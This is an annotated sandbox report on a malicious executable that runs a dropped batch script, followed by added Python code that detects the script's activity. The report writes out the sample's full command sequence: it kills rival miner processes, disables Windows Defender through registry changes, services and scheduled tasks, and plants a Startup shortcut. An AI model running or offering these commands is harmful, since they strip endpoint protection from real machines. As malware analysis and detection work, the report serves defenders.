Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | April 14, 2021, 6:14 p.m. | April 14, 2021, 6:16 p.m. |
Process tree. The dropped batch file FE9E.bat is run through cmd.exe with the path of fix.exe as its only argument, a layout consistent with a batch-to-exe wrapper (the static section below identifies the PureBasic compiler); the 41 child processes are the batch's commands in execution order. The C:\Windows\sysnative\ path is an alias that exists only for 32-bit processes on 64-bit Windows, so the launcher was running under WOW64.

Process | PID | Command line |
---|---|---|
cmd.exe | 2864 | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat C:\Users\test22\AppData\Local\Temp\fix.exe" |
taskkill.exe | 4636 | taskkill /F /IM ati_service.exe |
taskkill.exe | 3800 | taskkill /F /IM sihost32.exe |
taskkill.exe | 2848 | taskkill /F /IM sihost86.exe |
taskkill.exe | 8400 | taskkill /F /IM sihost64.exe |
taskkill.exe | 7772 | taskkill /F /IM nslookup.exe |
taskkill.exe | 7532 | taskkill /F /IM MSVSCService.exe |
taskkill.exe | 5272 | taskkill /F /IM mscvs.exe |
taskkill.exe | 1036 | taskkill /F /IM test.exe |
taskkill.exe | 3320 | taskkill /F /IM VSC_Host_Service.exe |
taskkill.exe | 4104 | taskkill /F /IM darkgenerationminer.exe |
taskkill.exe | 7184 | taskkill /F /IM nslookup.exe |
reg.exe | 5704 | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
reg.exe | 1032 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f |
reg.exe | 7276 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
reg.exe | 6584 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
reg.exe | 6316 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
reg.exe | 6848 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
reg.exe | 5176 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
reg.exe | 5012 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
reg.exe | 1536 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
reg.exe | 4472 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
reg.exe | 5676 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
reg.exe | 6188 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
reg.exe | 4428 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f |
reg.exe | 2316 | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
reg.exe | 5252 | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
schtasks.exe | 2364 | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
schtasks.exe | 5520 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
schtasks.exe | 3824 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
schtasks.exe | 8844 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
schtasks.exe | 8520 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
reg.exe | 5052 | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f |
reg.exe | 7996 | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f |
reg.exe | 5128 | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
reg.exe | 4020 | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
reg.exe | 2744 | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
reg.exe | 2708 | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
reg.exe | 2592 | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
reg.exe | 2180 | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
reg.exe | 1844 | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
reg.exe | 1136 | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |

Two caveats before reusing this as an indicator set. First, the guest is Windows 7 x64 (see the summary above) while the batch targets Windows 10 components (the Exploit Guard task, the SecurityHealth autorun, the WdNisSvc/WdNisDrv network-inspection services), so what is recorded is the attempt rather than a confirmed effect: reg add still creates missing keys, but schtasks /Change on a task that does not exist simply fails. Second, on current Windows 10/11 the DisableAntiSpyware policy value is ignored by Defender, and Tamper Protection blocks most of the remaining registry changes when it is enabled, so the detection value of this sequence lies in the command lines themselves rather than in the resulting state. Note also that the taskkill list names no security products; it reads as a competitor-kill list (darkgenerationminer.exe among them), which fits the coin-miner classification some engines give below.
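As an added example (not part of the sandbox report or of the sample), the Python below turns command lines like those above into a detection. It normalises registry paths so that the HKLM\...\CurrentControlSet spelling in the process tree and the HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001 spelling used later in the signature table compare equal, classifies each reg, schtasks and taskkill invocation against the Defender components touched here, and escalates taskkill only when a burst of distinct image names is seen, since a single kill is ordinary admin activity. The event list is constructed from the report plus three benign commands that must not fire; the technique names and the burst threshold of five are this example's own choices.

```python
"""Flag Defender tampering and AV/competitor kill lists in process command lines.

Added example, not code from the sandbox report.  SAMPLE_EVENTS is constructed
from the report's process tree plus benign noise that must not fire.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

_HIVES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CLASSES_ROOT": "HKCR",
          "HKEY_CURRENT_USER": "HKCU", "HKEY_USERS": "HKU"}


def normalize_regpath(path: str) -> str:
    """Canonical lower-case form: long hive names become short ones and the
    concrete ControlSet00N key becomes CurrentControlSet (a symbolic link to it)."""
    parts = [p for p in path.strip().strip('"').split("\\") if p]
    if not parts:
        return ""
    parts[0] = _HIVES.get(parts[0].upper(), parts[0].upper())
    parts[1:] = [re.sub(r"(?i)^ControlSet\d{3}$", "CurrentControlSet", p) for p in parts[1:]]
    return "\\".join(parts).lower()


def _under(key: str, prefix: str) -> bool:
    return key == prefix or key.startswith(prefix + "\\")


DEFENDER_POLICY = normalize_regpath(r"HKLM\Software\Policies\Microsoft\Windows Defender")
SERVICES = normalize_regpath(r"HKLM\System\CurrentControlSet\Services")
DEFENDER_SERVICES = {"windefend", "wdnissvc", "wdfilter", "wdboot", "wdnisdrv"}
DEFENDER_LOGGERS = {"defenderapilogger", "defenderauditlogger"}

# Key/value/data extraction; lazy key match stops at the closing quote or the next switch.
REG_ADD = re.compile(r'(?i)\breg(?:\.exe)?\s+add\s+"?([^"]+?)"?\s+/v\s+"?([^"\s]+)"?.*?/d\s+"?(\w+)"?')
REG_DELETE = re.compile(r'(?i)\breg(?:\.exe)?\s+delete\s+"?([^"]+?)"?(?=\s+/|\s*$)(?:\s+/v\s+"?([^"\s]+)"?)?')
SCHTASKS_DISABLE = re.compile(r'(?i)\bschtasks(?:\.exe)?\s+/change\s+/tn\s+"?([^"]+?)"?\s+/disable\b')
TASKKILL = re.compile(r'(?i)\btaskkill(?:\.exe)?\b.*?/im\s+"?([^"\s]+)"?')


@dataclass(frozen=True)
class Finding:
    technique: str
    detail: str
    cmdline: str


def analyze_cmdline(cmdline: str) -> list[Finding]:
    """Classify one command line.  Technique names are this example's own."""
    found: list[Finding] = []
    if (m := REG_ADD.search(cmdline)):
        key, value, data = normalize_regpath(m.group(1)), m.group(2).lower(), m.group(3)
        leaf = key.rsplit("\\", 1)[-1]
        if _under(key, DEFENDER_POLICY):
            found.append(Finding("defender-policy-tamper", f"{value}={data}", cmdline))
        elif _under(key, SERVICES) and value == "start" and data == "4" and leaf in DEFENDER_SERVICES:
            found.append(Finding("defender-service-disabled", leaf, cmdline))  # 4 = SERVICE_DISABLED
        elif "\\wmi\\autologger\\" in key and value == "start" and data == "0" and leaf in DEFENDER_LOGGERS:
            found.append(Finding("defender-etw-logger-disabled", leaf, cmdline))
    if (m := REG_DELETE.search(cmdline)):
        key, value = normalize_regpath(m.group(1)), (m.group(2) or "").lower()
        if _under(key, DEFENDER_POLICY):
            found.append(Finding("defender-policy-tamper", f"delete {key}", cmdline))
        elif value == "securityhealth":
            found.append(Finding("security-center-autorun-removed", key, cmdline))
        elif key.endswith("\\contextmenuhandlers\\epp"):
            found.append(Finding("defender-shell-extension-removed", key, cmdline))
    if (m := SCHTASKS_DISABLE.search(cmdline)) and re.search(r"(?i)windows defender|exploitguard", m.group(1)):
        found.append(Finding("defender-task-disabled", m.group(1), cmdline))
    if (m := TASKKILL.search(cmdline)):
        found.append(Finding("forced-process-kill", m.group(1).lower(), cmdline))
    return found


def triage(cmdlines: list[str], kill_burst: int = 5) -> dict:
    """Aggregate per-command findings into a host-level verdict.  A lone taskkill
    is normal; a burst of distinct image names (the report shows ten) is not."""
    findings = [f for c in cmdlines for f in analyze_cmdline(c)]
    killed = sorted({f.detail for f in findings if f.technique == "forced-process-kill"})
    techniques = sorted({f.technique for f in findings if f.technique != "forced-process-kill"})
    if len(killed) >= kill_burst:
        techniques.append("process-kill-burst")
    verdict = ("defender-tampering" if any(t.startswith("defender-") for t in techniques)
               else "suspicious" if techniques else "clean")
    return {"verdict": verdict, "techniques": techniques, "killed_images": killed, "findings": findings}


SAMPLE_EVENTS = [  # constructed: report command lines, one ControlSet001 spelling, benign noise
    r'taskkill /F /IM ati_service.exe',
    r'taskkill /F /IM sihost64.exe',
    r'taskkill /F /IM darkgenerationminer.exe',
    r'taskkill /F /IM MSVSCService.exe',
    r'taskkill /F /IM nslookup.exe',
    r'reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f',
    r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable',
    r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f',
    r'reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f',
    r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend" /v Start /t REG_DWORD /d 4 /f',
    r'reg add "HKCU\Software\Contoso\Editor" /v "Theme" /t REG_SZ /d "dark" /f',   # benign
    r'schtasks /Change /TN "Contoso\Nightly Backup" /Disable',                        # benign
    r'taskkill /F /IM notepad.exe',                                                   # benign alone
]

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    print(result["verdict"], result["techniques"])
    for f in result["findings"]:
        print(f"  {f.technique:34} {f.detail}")
```

Feeding real telemetry means supplying the CommandLine field of Sysmon event 1 or Windows Security event 4688 in place of SAMPLE_EVENTS; the path normalisation is what lets one rule cover both the process-tree and the signature-table spellings of the same key.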
Network activity.

Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. | | |

IP Address | Status | Action |
---|---|---|
172.217.25.14 | Active | Moloch |

Suricata Alerts | No Suricata Alerts |
---|---|
Suricata TLS | No Suricata TLS |

The single contacted address lies in Google's 172.217.0.0/16 range and was reached without any DNS lookup or Suricata alert, and nothing in the process tree opens a network connection; it is more plausibly guest background traffic than sample C2 and should not be treated as an indicator on its own.
Static properties.

Property | Value |
---|---|
section | .code |
packer | PureBasic 4.x -> Neil Hodgson |

The "packer" entry is a PEiD-style signature and identifies the PureBasic compiler rather than a runtime packer; the .code section name is consistent with that compiler.
Dropped files.

File | Note |
---|---|
C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat | the batch script executed by cmd.exe in the process tree |
C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk | a shortcut in the user's Startup folder named for agent.pyw; "바로 가기" is the Korean-locale equivalent of the " - Shortcut" suffix Windows appends to new shortcuts. A .pyw target runs windowless under pythonw.exe where Python is installed. This is the only persistence recorded; agent.pyw itself is not among the dropped files |
Command lines matched by a behavioural signature (shell and scheduled-task usage).

Type | Value |
---|---|
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
cmdline | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat C:\Users\test22\AppData\Local\Temp\fix.exe" |
cmdline | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
WMI queries observed. All ten are the same Win32_Process query, differing only in the Caption filter, one per image name passed to taskkill /IM. taskkill resolves image names through WMI, so these are a side effect of the kill list rather than independent process enumeration by the sample.

Query | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "<image>") |
---|---|
Caption values | sihost32.exe, MSVSCService.exe, test.exe, sihost64.exe, sihost86.exe, ati_service.exe, darkgenerationminer.exe, nslookup.exe, mscvs.exe, VSC_Host_Service.exe |
PE section entropy.

Section | Virtual address | Virtual size | Size of data | Entropy | Description |
---|---|---|---|---|---|
.rdata | 0x00012000 | 0x000033a0 | 0x00003400 | 7.1102355063 | A section with a high entropy has been found |
.rsrc | 0x00018000 | 0x00001584 | 0x00001600 | 7.6948361267 | A section with a high entropy has been found |
(whole file) | | | | 0.207865168539 | Overall entropy of this PE file is high |

The 0.2079 figure on the last row is not a Shannon entropy: it is the share of all section data held by the high-entropy sections (0x3400 + 0x1600 bytes out of the file's section data), reported because it exceeds the signature's 0.2 threshold. Entropy above 7 in .rdata and .rsrc is common for compressed resources and string tables and is weak evidence of packing on its own.
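The two entropy heuristics are easier to read once the arithmetic is visible. As an added example (not code from the report), the Python below reproduces both steps as the Cuckoo packer_entropy signature computes them, to this editor's reading: a section counts as high-entropy above 6.8 bits per byte, and the file is reported as "overall high" when such sections hold more than 20% of all section data. The .rdata and .rsrc rows are the report's own figures; the third row is an assumption, because the page does not list the remaining sections, and 0x11A00 bytes of ordinary data is the remainder that reproduces the report's 0.2079 by arithmetic (18944 / 0.207865168539 = 91136 bytes of section data in total).

```python
"""Reproduce the report's per-section and whole-file entropy heuristics.

Added example, not code from the sandbox report or the sample.  Thresholds
follow Cuckoo's packer_entropy signature as read by the editor.
"""
import math
import random
from collections import Counter

SECTION_THRESHOLD = 6.8   # bits per byte; a section above this is "high entropy"
RATIO_THRESHOLD = 0.2     # share of section bytes that must sit in such sections


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def assess_sections(sections):
    """sections: iterable of (name, size_of_data_in_bytes, entropy).

    Returns the flagged section names, the ratio the report prints as
    'Overall entropy', and whether that ratio crosses the threshold."""
    total = sum(size for _, size, _ in sections)
    flagged = [(name, size) for name, size, ent in sections if ent > SECTION_THRESHOLD]
    ratio = sum(size for _, size in flagged) / total if total else 0.0
    return {
        "high_entropy_sections": [name for name, _ in flagged],
        "ratio": ratio,
        "overall_high": ratio > RATIO_THRESHOLD,
    }


# First two rows: the report's figures.  Third row: ASSUMPTION.  The page does not
# list the other sections; 0x11A00 bytes of sub-threshold data is the remainder
# that reproduces the report's 0.2079 (0x3400 + 0x1600 = 18944; 18944 / 0.207865168539 = 91136).
REPORT_SECTIONS = [
    (".rdata", 0x3400, 7.110235506298322),
    (".rsrc", 0x1600, 7.694836126735778),
    ("<other sections, assumed>", 0x11A00, 5.0),
]


def constructed_section_bytes():
    """Constructed sample blobs showing what the per-section number measures."""
    rng = random.Random(2021)
    return {
        "packed-looking": bytes(rng.getrandbits(8) for _ in range(4096)),  # ~7.95
        "zero-padding": bytes(4096),                                        # 0.0
        "every-byte-once": bytes(range(256)) * 16,                          # exactly 8.0
    }


if __name__ == "__main__":
    for name, blob in constructed_section_bytes().items():
        print(f"{name:18} entropy={shannon_entropy(blob):.3f}")
    verdict = assess_sections(REPORT_SECTIONS)
    print(f"high-entropy sections: {verdict['high_entropy_sections']}")
    print(f"ratio={verdict['ratio']:.6f} overall_high={verdict['overall_high']}")
```

On a real sample, feed assess_sections the (Name, SizeOfRawData, entropy-of-raw-bytes) triples from the section table, computing the entropy with shannon_entropy over each section's raw bytes; the 0.2 ratio is a coarse heuristic and fires on many unpacked binaries with large resource sections.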
Yara matches. These come from a static scan of the file and indicate capability strings and imports, not behaviour observed at run time.

Rule | Description |
---|---|
win_registry | Affect system registries |
win_token | Affect system token |
win_files_operation | Affect private profile |
DebuggerCheck__GlobalFlags | (no description) |
DebuggerCheck__QueryInfo | (no description) |
DebuggerHiding__Thread | (no description) |
DebuggerHiding__Active | (no description) |
DebuggerException__SetConsoleCtrl | (no description) |
ThreadControl__Context | (no description) |
SEH__vectored | (no description) |
anti_dbg | Checks if being debugged |
disable_dep | Bypass DEP |

In the public anti-debug/anti-VM rule set these names come from, the conditions are string matches on API names (IsDebuggerPresent, VirtualProtect and similar) that most compiled executables import, so the anti-debug and disable_dep hits are low-confidence and should not be read as confirmed debugger evasion or DEP bypass.
Command lines matched by the behavioural signatures. These are the same 42 commands shown in the process tree above, so they are summarised by tool rather than repeated; the only form not in the process tree is the unquoted launcher variant C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat C:\Users\test22\AppData\Local\Temp\fix.exe".

Tool | Count | Targets |
---|---|---|
cmd.exe /c | 1 | FE9E.bat, invoked with the path of fix.exe as its argument |
taskkill /F /IM | 11 (10 distinct images) | ati_service.exe, sihost32.exe, sihost86.exe, sihost64.exe, nslookup.exe (twice), MSVSCService.exe, mscvs.exe, test.exe, VSC_Host_Service.exe, darkgenerationminer.exe |
reg delete | 1 | HKLM\Software\Policies\Microsoft\Windows Defender (whole key, before re-creating it with the values below) |
reg add REG_DWORD under HKLM\Software\Policies\Microsoft\Windows Defender | 12 | DisableAntiSpyware=1, DisableAntiVirus=1, MpEngine\MpEnablePus=0, Real-Time Protection\DisableBehaviorMonitoring=1, Real-Time Protection\DisableIOAVProtection=1, Real-Time Protection\DisableOnAccessProtection=1, Real-Time Protection\DisableRealtimeMonitoring=1, Real-Time Protection\DisableScanOnRealtimeEnable=1, Reporting\DisableEnhancedNotifications=1, SpyNet\DisableBlockAtFirstSeen=1, SpyNet\SpynetReporting=0, SpyNet\SubmitSamplesConsent=2 |
reg add Start=0 | 2 | HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger and DefenderAuditLogger (Defender's ETW autologger sessions turned off) |
schtasks /Change /TN ... /Disable | 5 | Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh; Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance, Windows Defender Cleanup, Windows Defender Scheduled Scan, Windows Defender Verification |
reg delete /v SecurityHealth | 2 | HKLM\Software\Microsoft\Windows\CurrentVersion\Run and HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run (the Windows Security tray-icon autorun) |
reg delete | 3 | HKCR\*\shellex\ContextMenuHandlers\EPP, HKCR\Directory\shellex\ContextMenuHandlers\EPP, HKCR\Drive\shellex\ContextMenuHandlers\EPP (Defender's scan-from-context-menu shell extension) |
reg add Start=4 (SERVICE_DISABLED) | 5 | HKLM\System\CurrentControlSet\Services\WdBoot, WdFilter, WdNisDrv, WdNisSvc, WinDefend |
Other indicators raised by the signatures.

Type | Value |
---|---|
host | 172.217.25.14 |
registry | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\SpyNet |
Antivirus verdicts (25 engines). The named verdicts cluster around AV-killing batch scripts (BAT/KillAV, Trojan.AVKill) and coin mining (Trojan.Win32.CoinMiner); the rest are generic or machine-learning detections.

Engine | Verdict |
---|---|
Bkav | W32.AIDetect.malware1 |
Elastic | malicious (high confidence) |
FireEye | Generic.mg.025e0b547c344ac7 |
Cylance | Unsafe |
Sangfor | Trojan.Win32.Save.a |
Cyren | W32/Trojan.IUNU-0892 |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | BAT/KillAV.NFF |
APEX | Malicious |
Cynet | Malicious (score: 100) |
Kaspersky | Trojan.Win32.Agent.xahlxv |
Paloalto | generic.ml |
McAfee-GW-Edition | BehavesLike.Win32.Generic.nh |
Sophos | ML/PE-A |
Jiangmin | Trojan.PowerShell.ev |
Kingsoft | Win32.Troj.Agent.(kcloud) |
Gridinsoft | Trojan.Win32.CoinMiner.vb!s1 |
Microsoft | Trojan:Script/Phonzy.A!ml |
Acronis | suspicious |
Malwarebytes | Trojan.AVKill |
Zoner | Trojan.Win32.73853 |
Rising | Malware.Heuristic!ET#100% (RDMK:cmRtazqvTOj24YHY3fvo4PROTNRA) |
Cybereason | malicious.126be5 |
Panda | Trj/Genetic.gen |
Qihoo-360 | HEUR/QVM05.1.92E2.Malware.Gen |
Defender policy and service changes recorded by the signatures. The ControlSet001 paths here are the concrete keys behind CurrentControlSet, which is a symbolic link to the active control set, so they are the same keys the reg add commands in the process tree wrote; Start=4 is SERVICE_DISABLED.

Description | Registry key or service |
---|---|
attempts to modify windows defender policies | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable |
attempts to modify windows defender policies | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting\DisableEnhancedNotifications |
attempts to modify windows defender policies | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine\MpEnablePus |
attempts to modify windows defender policies | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection |
attempts to modify windows defender policies | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring |
attempts to modify windows defender policies | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware |
attempts to modify windows defender policies | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent |
attempts to modify windows defender policies | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\DisableBlockAtFirstSeen |
attempts to modify windows defender policies | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus |
attempts to modify windows defender policies | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring |
attempts to modify windows defender policies | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SpynetReporting |
attempts to modify windows defender policies | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection |
attempts to disable windows defender | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start |
service set to Start=4 | WdNisDrv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start) |
service set to Start=4 | WdFilter (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start) |
service set to Start=4 | WdNisSvc (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start) |
service set to Start=4 | WdBoot (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start) |
service set to Start=4 | WinDefend (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start) |